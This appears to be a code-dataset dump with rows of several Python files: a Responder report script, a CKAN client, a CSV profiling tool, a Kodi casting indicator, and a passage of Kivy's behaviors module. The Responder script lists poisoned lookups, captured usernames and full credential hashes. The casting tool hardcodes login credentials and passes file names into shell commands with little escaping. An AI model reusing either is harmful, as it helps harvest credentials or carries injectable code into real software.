repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
tholum/PiBunny
|
system.d/library/tools_installer/tools_to_install/responder/Report.py
|
1
|
3980
|
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlite3
import os
def color(txt, code = 1, modifier = 0):
if txt.startswith('[*]'):
settings.Config.PoisonersLogger.warning(txt)
elif 'Analyze' in txt:
settings.Config.AnalyzeLogger.warning(txt)
if os.name == 'nt': # No colors for windows...
return txt
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def DbConnect():
cursor = sqlite3.connect("./Responder.db")
return cursor
def GetResponderData(cursor):
res = cursor.execute("SELECT * FROM Responder")
for row in res.fetchall():
print('{0} : {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}'.format(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8]))
def GetResponderUsernamesStatistic(cursor):
res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder")
for row in res.fetchall():
print color('[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1)
def GetResponderUsernames(cursor):
res = cursor.execute("SELECT DISTINCT user FROM Responder")
for row in res.fetchall():
print('User account: {0}'.format(row[0]))
def GetResponderUsernamesWithDetails(cursor):
res = cursor.execute("SELECT client, user, module, type, cleartext FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder) ORDER BY client")
for row in res.fetchall():
print('IP: {0} module: {1}:{3}\nuser account: {2}'.format(row[0], row[2], row[1], row[3]))
def GetResponderCompleteHash(cursor):
res = cursor.execute("SELECT fullhash FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
for row in res.fetchall():
print('{0}'.format(row[0]))
def GetUniqueLookups(cursor):
res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
for row in res.fetchall():
print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3]))
def GetStatisticUniqueLookups(cursor):
res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)")
for row in res.fetchall():
print color('[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1)
def SavePoisonersToDb(result):
for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode']:
if not k in result:
result[k] = ''
def SaveToDb(result):
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
cursor = DbConnect()
print color("[+] Generating report...", code = 3, modifier = 1)
print color("[+] Unique lookups ordered by IP:", code = 2, modifier = 1)
GetUniqueLookups(cursor)
GetStatisticUniqueLookups(cursor)
print color("\n[+] Extracting captured usernames:", code = 2, modifier = 1)
GetResponderUsernames(cursor)
print color("\n[+] Username details:", code = 2, modifier = 1)
GetResponderUsernamesWithDetails(cursor)
GetResponderUsernamesStatistic(cursor)
#print color("\n[+] Captured hashes:", code = 2, modifier = 1)
#GetResponderCompleteHash(cursor)
|
mit
| -430,646,472,000,770,940
| 40.894737
| 170
| 0.691457
| false
| 3.35865
| false
| false
| false
|
thriuin/ckan_client_demo
|
create_open_data.py
|
1
|
1540
|
__author__ = 'Statistics Canada'
__copyright__ = 'Crown Copyright, Canada 2014'
import urllib2
import simplejson as json
# Add a new data set. For this example, we will use the NAICS 2012 dataset from Statistics Canada
# Ensure the data set does not already exist. Exit if it does
query_data = urllib2.quote(json.dumps({'id': '9b25e61a-89c3-4719-afd8-fc61c7aeba0c'}))
found = False
try:
# Use a valid URL
response = urllib2.urlopen('http://data.gc.ca/test/api/3/action/package_show', query_data)
if response.code == 200:
print "Data set already exists."
exit()
except urllib2.HTTPError, hx:
# If the data set is not found, a 404 exception is thrown
if hx.code == 404:
"Data set not found. Proceeding..."
else:
print "Unexpected error: " + hx.__str__()
exit()
# Load the JSON and call the CKAN API function package_create()
try:
new_ds = json.load(open("new_data_set.json"))
except json.JSONDecodeError, jx:
print('Invalid JSON: ' + jx.__str__())
# Encode the JSON for the HTTP header
new_ds_string = urllib2.quote(json.dumps(new_ds))
# Call the CKAN API function package_create(). Use a valid URL
request = urllib2.Request('http://data.gc.ca/test/api/action/package_create')
# Replace xxxx... with an appropriate API Key
request.add_header('Authorization', 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx')
try:
response = urllib2.urlopen(request, new_ds_string)
print "CKAN Return Code: " + response.code
except urllib2.HTTPError, hx:
print hx.__str__()
|
mit
| -5,844,206,824,841,157,000
| 31.083333
| 97
| 0.687013
| false
| 3.276596
| false
| false
| false
|
android-art-intel/marshmallow
|
art-extension/tools/perf_analysis/find_hottest.py
|
1
|
3556
|
#!/usr/bin/python
import os, sys, csv, operator, heapq
def GetMethodName(filename):
with open(filename, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=';', quotechar='"')
for row in spamreader:
for cell in row:
return cell
def AppendData(filename, data):
data[filename] = {}
with open(filename, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=';', quotechar='"')
for i,row in enumerate(spamreader):
data[filename][i] = {}
for j,cell in enumerate(row):
data[filename][i][j] = cell
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def ComputeData(data, max_data, sum_data):
for filename in data:
for i in data[filename]:
if len(max_data) < len(data[filename]):
max_data.append([])
if len(sum_data) < len(data[filename]):
sum_data.append([])
for j in data[filename][i]:
# append new 0s if any
if len(max_data[i]) < len(data[filename][i]):
max_data[i].append(0)
if len(sum_data[i]) < len(data[filename][i]):
sum_data[i].append(0)
# if cell is a number, then we can update our numbers.
if is_number(data[filename][i][j]):
if len(max_data[i]) < len(data[filename][i]):
max_data[i].append(0)
if len(sum_data[i]) < len(data[filename][i]):
sum_data[i].append(0)
f_data = float(data[filename][i][j])
f_max = float(max_data[i][j])
# compute max data
if f_max < f_data:
max_data[i][j] = f_data
# compute sum data
sum_data[i][j] += f_data
else:
max_data[i][j] = data[filename][i][j]
sum_data[i][j] = data[filename][i][j]
def ComputeSumPerMethod(data, sum_per_method, metric_id):
for filename in data:
sum_per_method[filename] = 0
for i in data[filename]:
if is_number(data[filename][i][metric_id]):
sum_per_method[filename] += float(data[filename][i][metric_id])
def DumpData(output_name, data, max_data, sum_data):
if len(data) == 0:
return
with open(output_name, 'wb') as myfile:
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
wr.writerow(['Max'])
for row in max_data:
wr.writerow(row)
wr.writerow(['Sum'])
for row in sum_data:
wr.writerow(row)
def DumpHottestMethods(output_name, sorted_methods, sum_per_method):
if len(data) == 0:
return
with open(output_name, 'wb') as myfile:
wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
for filename in sorted_methods:
wr.writerow([GetMethodName(filename), sum_per_method[filename]])
if len(sys.argv) != 2:
print "Usage: ./find_hottest.py [folder-name]"
sys.exit(0)
data = {}
folder_name = sys.argv[1]
found_file = False
print "Collecting data..."
for filename in os.listdir(folder_name):
if filename.endswith(".csv"):
filename = folder_name + "/" + filename
AppendData(filename, data)
found_file = True
if found_file == False:
print "There is no CSV file in folder " + folder_name
else:
sum_per_method = {}
print "Computing sum per method..."
ComputeSumPerMethod(data, sum_per_method, 1)
print "Sorting data..."
# sorted_methods = heapq.nlargest(10, list(sum_per_method))
sorted_methods = list(sorted(sum_per_method, key=sum_per_method.__getitem__, reverse=True))
print "Dumping data..."
DumpHottestMethods("hottest_methods.csv", sorted_methods, sum_per_method)
sys.stdout.write("\nDone.\n")
|
apache-2.0
| -1,728,301,882,559,878,000
| 28.38843
| 93
| 0.61108
| false
| 3.235669
| false
| false
| false
|
gazhay/kodikast
|
lukecast.py
|
1
|
12945
|
#!/usr/bin/env python3
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GLib, GdkPixbuf
try:
gi.require_version('AppIndicator3', '0.1')
from gi.repository import AppIndicator3 as AppIndicator
except:
from gi.repository import AppIndicator
import re,subprocess,socket
import urllib.parse,time,os,signal,sys
import base64
from random import randint
from zeroconf import ServiceBrowser, Zeroconf
from gi.repository import GObject
tempsock = "/tmp/lukecast"
# TODO
# Playlist - if we can vlc:quit after a file, we can do multiple files
# Broadcast - stream to all clients found
# Authorisation at Kodi End - uname pwd
#
VERSION = "0.5a"
ICONDIR = "./kodikasticons"
DEVMODE = True
def shellquote(s):
return "'" + s.replace("'", "'\\''") + "'"
def alert(msg):
parent = None
md = Gtk.MessageDialog(parent, 0, Gtk.MessageType.INFO, Gtk.ButtonsType.CLOSE, msg)
md.run()
md.destroy()
Hosts = []
MandatoryFudgePeriod = 3;
# Check for VLC
isVLC = subprocess.run(["which vlc"], stdout=subprocess.PIPE, shell=True)
# print(isVL/C.stdout)
if (isVLC.stdout==b''):
alert("VLC is not installed, cannot continue")
quit()
# Check for webcam
videoDevs = subprocess.run(["ls /dev/video* | wc -l"], stdout=subprocess.PIPE, shell=True)
if (videoDevs.stdout!=b''):
# print("Number of devices {%d}" % int(videoDevs.stdout));
videoOn=True
else:
videoOn=False
def get_resource_path(rel_path):
dir_of_py_file = os.path.dirname(__file__)
rel_path_to_resource = os.path.join(dir_of_py_file, rel_path)
abs_path_to_resource = os.path.abspath(rel_path_to_resource)
return abs_path_to_resource
# ############################################################################## Indicator
class IndicatorKodicast:
SubMenuRef = ""
SubMenuGroup = ""
KodiTarget = ""
VLCPid = ""
mode = 0
# lastConnect = None
# statusIcons = [ "KodiKast-Red", "KodiKast-Grn", "KodiKast-Ylw", "KodiKast-Ppl" ]
statusIcons = [ "LukeInit", "LukeGrey", "LukeGreen", "LukeBlue" ]
def addSeperator(self, menu):
item = Gtk.SeparatorMenuItem()
item.show()
menu.append(item)
def addMenuItem(self, menu, label, handler):
item = Gtk.MenuItem()
item.set_label(label)
item.connect("activate", handler)
item.show()
menu.append(item)
def addRadioMenu(self, menu, label):
item = Gtk.CheckMenuItem(label=label)
item.set_active(is_active=False)
# item.connect("activate", self.toggleMe)
item.show()
menu.append(item)
def addSubMenu(self, menu, label):
pass
def aboutDialog(self, evt):
dlg = Gtk.AboutDialog();
dlg.set_name("About...")
dlg.set_program_name("Luke Cast")
dlg.set_version(VERSION)
dlg.set_comments("""
A GTK Indicator to stream media to Avahi discovered Kodi instances.
Media, Screen, Webcam, to any Kodi with jsonrpc enabled.
""")
dlg.set_authors(['Gareth Hay'])
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(get_resource_path(ICONDIR)+"/"+self.statusIcons[ randint(0, len(self.statusIcons)-1) ]+".png" , 100, 100)
dlg.set_logo(pixbuf)
# dlg.set_logo_icon_name("kodi")
dlg.show()
def reboot(self, evt):
self.handler_cast_stop()
Gtk.main_quit()
os.execv(__file__, sys.argv)
def __init__(self):
self.ind = AppIndicator.Indicator.new("indicator-lukecast", self.statusIcons[0], AppIndicator.IndicatorCategory.SYSTEM_SERVICES)
self.ind.set_icon_theme_path( get_resource_path(ICONDIR))
self.ind.set_icon( self.statusIcons[0] )
self.ind.set_status (AppIndicator.IndicatorStatus.ACTIVE)
self.mode = 0
# have to give indicator a menu
self.menu = Gtk.Menu()
self.addMenuItem( self.menu, "About...", self.aboutDialog)
if DEVMODE:
self.addMenuItem( self.menu, "Restart", self.reboot)
self.addMenuItem(self.menu, "Reconnect Receiver", self.handler_reconnect )
self.addSeperator(self.menu)
item = Gtk.MenuItem()
item.set_label("Available Receivers")
submenu = Gtk.Menu()
subitem = Gtk.RadioMenuItem(group=None, label="Nowhere")
subitem.set_active(is_active=True)
subitem.connect("activate", self.handlesubChecks)
subitem.show()
submenu.append(subitem)
submenu.show()
item.set_submenu( submenu )
self.SubMenuGroup = subitem
self.SubMenuRef = submenu
item.show()
self.menu.append(item)
self.addSeperator( self.menu )
self.addMenuItem(self.menu, "Start Screen Cast" , self.handler_cast_start)
self.addMenuItem(self.menu, "Start File Cast...", self.handler_cast_file )
if videoOn:
self.addMenuItem(self.menu, "Start Webcam Stream0" , self.handler_cast_cam )
self.addRadioMenu(self.menu, " With Sound")
self.addMenuItem(self.menu, "Stop Cast" , self.handler_cast_stop )
self.addSeperator( self.menu )
self.addMenuItem(self.menu, "Exit" , self.handler_menu_exit )
self.menu.show()
self.ind.set_menu(self.menu)
GLib.timeout_add_seconds(1, self.handler_timeout)
def handler_reconnect(self,evt=None, hosts=None):
if hosts==None:
hosts = self.KodiTarget
if socket.gethostname().find('.')>=0:
thisisme=socket.gethostname()
else:
thisisme=socket.gethostbyaddr(socket.gethostname())[0]
jsonpart = {'request' : '{"jsonrpc":"2.0", "id":1, "method": "Player.Open","params":{"item":{"file":"http://%s:8554/stream.mp4"}}}' % thisisme }
jsonstr = urllib.parse.urlencode(jsonpart) # added parse. as its moved in python3
# This will have to be for multiple hosts
streamUrl = 'http://%s:8080/jsonrpc?' % (hosts)
streamUrl+= jsonstr
credentials = b'kodi:test'
encoded_credentials = base64.b64encode(credentials)
authorization = b'Basic ' + encoded_credentials
command = "/usr/bin/curl -g -H 'Content-Type: application/json' -H 'Authorization: %s' -H 'Accept: application/json' '%s'" % (authorization.decode("utf-8") , streamUrl)
print("Executing %s" % command)
curlProc = subprocess.run(command, stdout=subprocess.PIPE, shell=True)
print(curlProc.stdout)
connect_hosts=handler_reconnect
def handlesubChecks(self, evt):
if evt.get_active()==True:
self.KodiTarget = evt.get_label()
self.mode = 1
if self.KodiTarget == "Nowhere":
self.mode = 0
def handler_menu_exit(self, evt):
Gtk.main_quit()
def handler_cast_file(self, evt):
dialog = Gtk.FileChooserDialog("Please choose a file", None,
Gtk.FileChooserAction.OPEN,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_OPEN, Gtk.ResponseType.OK))
filter = Gtk.FileFilter()
filter.set_name("Videos")
filter.add_mime_type("video/mpeg")
filter.add_pattern("*.mp4")
filter.add_pattern("*.ogg")
filter.add_pattern("*.mkv")
filter.add_pattern("*.mpeg")
filter.add_pattern("*.avi")
dialog.add_filter(filter)
response = dialog.run()
ff = self.fudgeUri(dialog.get_filename())
dialog.destroy()
time.sleep(0.1)
if response == Gtk.ResponseType.OK:
self.streamUrlTo( ff, self.KodiTarget )
return
elif response == Gtk.ResponseType.CANCEL:
print("Cancel clicked")
def fudgeUri(self, inuri):
return "file://"+(inuri.replace("\n","").replace(" ","\ ")+" vlc://quit")
# /* Handle a dropped file on a desktop file with code below */
def handler_drop_cast_start(self):
content = open(tempsock, 'r').read()
if (len(content)>0):
# trim this and cvlc stream it.
# refactor stream launch code to function(url, hosts)
open(tempsock,"w").close()
content=self.fudgeUri(content)
# print(content)
if not self.targetCheck():
alert("No target selected")
return
self.streamUrlTo( content, self.KodiTarget )
self.lastConnect = None
time.sleep(0.1) # stops a cpu 100% problem
return True
def targetCheck(self):
if (self.KodiTarget == "") or (self.KodiTarget=="Nowhere"):
return False
return True
def streamUrlTo(self, uri, hostlist):
self.mode = 2 # :input-slave=alsa://hw:0,0
sout = "#transcode{vcodec=h264,acodec=mpga,ab=128,channels=2,samplerate=44100}:standard{access=http,mux=ts,ttl=15,dst=:8554/stream.mp4"
# sout = "#transcode{vcodec=h264,scale=1,vb=0}:standard{access=http,mux=ts,ttl=15,dst=:8554/}"
command = 'vlc -Idummy '+uri+' --sout "%s"' % sout
# print("## Command to exec")
# print(command)
# print("##")
self.VLCPid = subprocess.Popen(command, shell=True, preexec_fn=os.setsid)
self.handler_reconnect(hosts=hostlist)
def handler_cast_start(self, evt=None):
if not self.targetCheck():
alert("No target selected")
return
self.streamUrlTo("screen:// :screen-fps=10 :screen-caching=10 vlc://quit", self.KodiTarget)
def handler_cast_cam(self, evt):
if not self.targetCheck():
alert("No target selected")
return
# With audio here
self.streamUrlTo("v4l2:///dev/video0 vlc://quit", self.KodiTarget)
def handler_cast_stop(self, evt=None):
self.stopCasting()
def handler_timeout(self):
"""This will be called every few seconds by the GLib.timeout.
"""
if self.KodiTarget=="Nowhere":
self.KodiTarget=""
self.mode = 0
if self.KodiTarget=="" and self.VLCPid != "":
self.killVLC()
if self.VLCPid != "":
try:
if self.VLCPid.poll()==None:
pass
else:
self.mode = 1
except OSError:
self.mode = 1
if (self.ind.get_icon() != self.statusIcons[self.mode]):
self.ind.set_icon(self.statusIcons[self.mode])
return True
def killVLC( self ):
try:
os.killpg(os.getpgid(self.VLCPid.pid), signal.SIGTERM)
except:
command = 'killall vlc'
process = subprocess.run(command, shell=True)
def stopCasting( self ):
self.mode = 1
self.killVLC()
def quitApp( self ):
self.stopCasting()
def main(self):
# attempt multiprocess shenanigans
GObject.idle_add(self.handler_drop_cast_start)
Gtk.main()
# ############################################################################## Avahi
class AvahiListener(object):
# Having problems removing - could be pyhton2->3 conversioj rpbos
target = ""
DEBUGME = False;
def remove_service(self, zeroconf, type, name):
for host in Hosts:
if host.get("name")== name:
info = host
for itemA in self.target.SubMenuRef.get_children():
if itemA.get_label()==info['info'].server:
if itemA.get_active():
self.target.KodiTarget = ""
self.target.mode=0
self.target.SubMenuRef.remove(itemA) #itemA.remove()
if self.DEBUGME: print("Service %s removed" % (info['info'].server,))
Hosts.remove(info)
def add_service(self, zeroconf, type, name):
info = zeroconf.get_service_info(type, name)
# subitem = Gtk.CheckMenuItem()
subitem = Gtk.RadioMenuItem(group=self.target.SubMenuGroup, label=info.server)
subitem.connect("activate", self.target.handlesubChecks)
subitem.set_label(info.server)
subitem.show()
self.target.SubMenuRef.append(subitem)
self.target.SubMenuRef.show()
Hosts.append({"name": name, "info": info})
if self.DEBUGME: print("Service %s removed" % (info['info'].server,))
def setTarget(self, targetobj):
self.target = targetobj
# ############################################################################## Main
if __name__ == "__main__":
try:
zeroconf = Zeroconf()
listener = AvahiListener()
ind = IndicatorKodicast()
listener.setTarget(ind);
browser = ServiceBrowser(zeroconf, "_xbmc-jsonrpc._tcp.local.", listener)
try:
open(tempsock,"w").close();
except:
print( "socket file not available")
pass
ind.main()
finally:
ind.handler_cast_stop()
|
gpl-3.0
| -4,870,596,901,379,037,000
| 34.368852
| 178
| 0.588335
| false
| 3.573006
| false
| false
| false
|
angryrancor/kivy
|
kivy/uix/behaviors.py
|
1
|
56965
|
'''
Behaviors
=========
.. versionadded:: 1.8.0
This module implements behaviors that can be mixed with existing base widgets.
For example, if you want to add a "button" capability to an
:class:`~kivy.uix.image.Image`, you could do::
class IconButton(ButtonBehavior, Image):
pass
This would give you an :class:`~kivy.uix.image.Image` with the events and
properties inherited from :class:`ButtonBehavior`. For example, the *on_press*
and *on_release* events would be fired when appropriate::
class IconButton(ButtonBehavior, Image):
def on_press(self):
print("on_press")
Or in kv::
IconButton:
on_press: print('on_press')
Naturally, you could also bind to any property changes the behavior class
offers::
def state_changed(*args):
print('state changed')
button = IconButton()
button.bind(state=state_changed)
.. note::
The behavior class must always be _before_ the widget class. If you don't
specify the inheritance in this order, the behavior will not work because
the behavior methods are overwritten by the class method listed first.
Similarly, if you combine a behavior class with a class which
requires the use of the methods also defined by the behavior class, the
resulting class may not function properly. E.g. combining a ButtonBehavior
with a Slider, both of which require the on_touch_up methods, the resulting
class will not work.
'''
__all__ = ('ButtonBehavior', 'ToggleButtonBehavior', 'DragBehavior',
'FocusBehavior', 'CompoundSelectionBehavior')
from kivy.clock import Clock
from kivy.properties import OptionProperty, ObjectProperty, NumericProperty,\
ReferenceListProperty, BooleanProperty, ListProperty, AliasProperty
from kivy.config import Config
from kivy.metrics import sp
from kivy.base import EventLoop
from kivy.logger import Logger
from functools import partial
from weakref import ref
from time import time
import string
# When we are generating documentation, Config doesn't exist
_scroll_timeout = _scroll_distance = 0
_is_desktop = False
_keyboard_mode = 'system'
if Config:
_scroll_timeout = Config.getint('widgets', 'scroll_timeout')
_scroll_distance = Config.getint('widgets', 'scroll_distance')
_is_desktop = Config.getboolean('kivy', 'desktop')
_keyboard_mode = Config.get('kivy', 'keyboard_mode')
class ButtonBehavior(object):
'''Button behavior.
:Events:
`on_press`
Fired when the button is pressed.
`on_release`
Fired when the button is released (i.e. the touch/click that
pressed the button goes away).
'''
state = OptionProperty('normal', options=('normal', 'down'))
'''State of the button, must be one of 'normal' or 'down'.
The state is 'down' only when the button is currently touched/clicked,
otherwise 'normal'.
:attr:`state` is an :class:`~kivy.properties.OptionProperty`.
'''
last_touch = ObjectProperty(None)
'''Contains the last relevant touch received by the Button. This can
be used in `on_press` or `on_release` in order to know which touch
dispatched the event.
.. versionadded:: 1.8.0
:attr:`last_touch` is a :class:`~kivy.properties.ObjectProperty`,
defaults to None.
'''
MIN_STATE_TIME = 0.035
'''The minimum period of time which the widget must remain in the
`'down'` state.
:attr:`MIN_STATE_TIME` is a float.
'''
always_release = BooleanProperty(True)
'''This determines if the widget fires a `on_release` event if
the touch_up is outside the widget.
.. versionadded:: 1.9.0
:attr:`always_release` is a :class:`~kivy.properties.BooleanProperty`,
defaults to `True`.
'''
def __init__(self, **kwargs):
self.register_event_type('on_press')
self.register_event_type('on_release')
super(ButtonBehavior, self).__init__(**kwargs)
self.__state_event = None
self.__touch_time = None
self.fbind('state', self.cancel_event)
def _do_press(self):
self.state = 'down'
def _do_release(self, *args):
self.state = 'normal'
def cancel_event(self, *args):
if self.__state_event:
self.__state_event.cancel()
self.__state_event = None
def on_touch_down(self, touch):
if super(ButtonBehavior, self).on_touch_down(touch):
return True
if touch.is_mouse_scrolling:
return False
if not self.collide_point(touch.x, touch.y):
return False
if self in touch.ud:
return False
touch.grab(self)
touch.ud[self] = True
self.last_touch = touch
self.__touch_time = time()
self._do_press()
self.dispatch('on_press')
return True
def on_touch_move(self, touch):
if touch.grab_current is self:
return True
if super(ButtonBehavior, self).on_touch_move(touch):
return True
return self in touch.ud
def on_touch_up(self, touch):
if touch.grab_current is not self:
return super(ButtonBehavior, self).on_touch_up(touch)
assert(self in touch.ud)
touch.ungrab(self)
self.last_touch = touch
if (not self.always_release
and not self.collide_point(*touch.pos)):
self.state = 'normal'
return
touchtime = time() - self.__touch_time
if touchtime < self.MIN_STATE_TIME:
self.__state_event = Clock.schedule_once(
self._do_release, self.MIN_STATE_TIME - touchtime)
else:
self._do_release()
self.dispatch('on_release')
return True
def on_press(self):
pass
def on_release(self):
pass
def trigger_action(self, duration=0.1):
'''Trigger whatever action(s) have been bound to the button by calling
both the on_press and on_release callbacks.
This simulates a quick button press without using any touch events.
Duration is the length of the press in seconds. Pass 0 if you want
the action to happen instantly.
.. versionadded:: 1.8.0
'''
self._do_press()
self.dispatch('on_press')
def trigger_release(dt):
self._do_release()
self.dispatch('on_release')
if not duration:
trigger_release(0)
else:
Clock.schedule_once(trigger_release, duration)
class ToggleButtonBehavior(ButtonBehavior):
'''ToggleButton behavior, see ToggleButton module documentation for more
information.
.. versionadded:: 1.8.0
'''
__groups = {}
group = ObjectProperty(None, allownone=True)
'''Group of the button. If None, no group will be used (button is
independent). If specified, :attr:`group` must be a hashable object, like
a string. Only one button in a group can be in 'down' state.
:attr:`group` is a :class:`~kivy.properties.ObjectProperty`
'''
allow_no_selection = BooleanProperty(True)
'''This specifies whether the checkbox in group allows everything to
be deselected.
.. versionadded:: 1.9.0
:attr:`allow_no_selection` is a :class:`BooleanProperty` defaults to
`True`
'''
def __init__(self, **kwargs):
self._previous_group = None
super(ToggleButtonBehavior, self).__init__(**kwargs)
def on_group(self, *largs):
groups = ToggleButtonBehavior.__groups
if self._previous_group:
group = groups[self._previous_group]
for item in group[:]:
if item() is self:
group.remove(item)
break
group = self._previous_group = self.group
if group not in groups:
groups[group] = []
r = ref(self, ToggleButtonBehavior._clear_groups)
groups[group].append(r)
def _release_group(self, current):
if self.group is None:
return
group = self.__groups[self.group]
for item in group[:]:
widget = item()
if widget is None:
group.remove(item)
if widget is current:
continue
widget.state = 'normal'
def _do_press(self):
if (not self.allow_no_selection and
self.group and self.state == 'down'):
return
self._release_group(self)
self.state = 'normal' if self.state == 'down' else 'down'
def _do_release(self, *args):
pass
@staticmethod
def _clear_groups(wk):
# auto flush the element when the weak reference have been deleted
groups = ToggleButtonBehavior.__groups
for group in list(groups.values()):
if wk in group:
group.remove(wk)
break
@staticmethod
def get_widgets(groupname):
'''Return the widgets contained in a specific group. If the group
doesn't exist, an empty list will be returned.
.. important::
Always release the result of this method! In doubt, do::
l = ToggleButtonBehavior.get_widgets('mygroup')
# do your job
del l
.. warning::
It's possible that some widgets that you have previously
deleted are still in the list. Garbage collector might need
more elements before flushing it. The return of this method
is informative, you've been warned!
'''
groups = ToggleButtonBehavior.__groups
if groupname not in groups:
return []
return [x() for x in groups[groupname] if x()][:]
class DragBehavior(object):
'''Drag behavior. When combined with a widget, dragging in the rectangle
defined by :attr:`drag_rectangle` will drag the widget.
For example, to make a popup which is draggable by its title do::
from kivy.uix.behaviors import DragBehavior
from kivy.uix.popup import Popup
class DragPopup(DragBehavior, Popup):
pass
And in .kv do::
<DragPopup>:
drag_rectangle: self.x, self.y+self._container.height, self.width,\
self.height - self._container.height
drag_timeout: 10000000
drag_distance: 0
.. versionadded:: 1.8.0
'''
drag_distance = NumericProperty(_scroll_distance)
'''Distance to move before dragging the :class:`DragBehavior`, in pixels.
As soon as the distance has been traveled, the :class:`DragBehavior` will
start to drag, and no touch event will go to children.
It is advisable that you base this value on the dpi of your target device's
screen.
:attr:`drag_distance` is a :class:`~kivy.properties.NumericProperty`,
defaults to 20 (pixels), according to the default value of scroll_distance
in user configuration.
'''
drag_timeout = NumericProperty(_scroll_timeout)
'''Timeout allowed to trigger the :attr:`drag_distance`, in milliseconds.
If the user has not moved :attr:`drag_distance` within the timeout,
dragging will be disabled, and the touch event will go to the children.
:attr:`drag_timeout` is a :class:`~kivy.properties.NumericProperty`,
defaults to 55 (milliseconds), according to the default value of
scroll_timeout in user configuration.
'''
drag_rect_x = NumericProperty(0)
'''X position of the axis aligned bounding rectangle where dragging
is allowed. In window coordinates.
:attr:`drag_rect_x` is a :class:`~kivy.properties.NumericProperty`,
defaults to 0.
'''
drag_rect_y = NumericProperty(0)
'''Y position of the axis aligned bounding rectangle where dragging
is allowed. In window coordinates.
:attr:`drag_rect_Y` is a :class:`~kivy.properties.NumericProperty`,
defaults to 0.
'''
drag_rect_width = NumericProperty(100)
'''Width of the axis aligned bounding rectangle where dragging is allowed.
:attr:`drag_rect_width` is a :class:`~kivy.properties.NumericProperty`,
defaults to 100.
'''
drag_rect_height = NumericProperty(100)
'''Height of the axis aligned bounding rectangle where dragging is allowed.
:attr:`drag_rect_height` is a :class:`~kivy.properties.NumericProperty`,
defaults to 100.
'''
drag_rectangle = ReferenceListProperty(drag_rect_x, drag_rect_y,
drag_rect_width, drag_rect_height)
'''Position and size of the axis aligned bounding rectangle where dragging
is allowed.
:attr:`drag_rectangle` is a :class:`~kivy.properties.ReferenceListProperty`
of (:attr:`drag_rect_x`, :attr:`drag_rect_y`, :attr:`drag_rect_width`,
:attr:`drag_rect_height`) properties.
'''
def __init__(self, **kwargs):
self._drag_touch = None
super(DragBehavior, self).__init__(**kwargs)
def _get_uid(self, prefix='sv'):
return '{0}.{1}'.format(prefix, self.uid)
def on_touch_down(self, touch):
xx, yy, w, h = self.drag_rectangle
x, y = touch.pos
if not self.collide_point(x, y):
touch.ud[self._get_uid('svavoid')] = True
return super(DragBehavior, self).on_touch_down(touch)
if self._drag_touch or ('button' in touch.profile and
touch.button.startswith('scroll')) or\
not ((xx < x <= xx + w) and (yy < y <= yy + h)):
return super(DragBehavior, self).on_touch_down(touch)
# no mouse scrolling, so the user is going to drag with this touch.
self._drag_touch = touch
uid = self._get_uid()
touch.grab(self)
touch.ud[uid] = {
'mode': 'unknown',
'dx': 0,
'dy': 0}
Clock.schedule_once(self._change_touch_mode,
self.drag_timeout / 1000.)
return True
def on_touch_move(self, touch):
if self._get_uid('svavoid') in touch.ud or\
self._drag_touch is not touch:
return super(DragBehavior, self).on_touch_move(touch) or\
self._get_uid() in touch.ud
if touch.grab_current is not self:
return True
uid = self._get_uid()
ud = touch.ud[uid]
mode = ud['mode']
if mode == 'unknown':
ud['dx'] += abs(touch.dx)
ud['dy'] += abs(touch.dy)
if ud['dx'] > sp(self.drag_distance):
mode = 'drag'
if ud['dy'] > sp(self.drag_distance):
mode = 'drag'
ud['mode'] = mode
if mode == 'drag':
self.x += touch.dx
self.y += touch.dy
return True
def on_touch_up(self, touch):
if self._get_uid('svavoid') in touch.ud:
return super(DragBehavior, self).on_touch_up(touch)
if self._drag_touch and self in [x() for x in touch.grab_list]:
touch.ungrab(self)
self._drag_touch = None
ud = touch.ud[self._get_uid()]
if ud['mode'] == 'unknown':
super(DragBehavior, self).on_touch_down(touch)
Clock.schedule_once(partial(self._do_touch_up, touch), .1)
else:
if self._drag_touch is not touch:
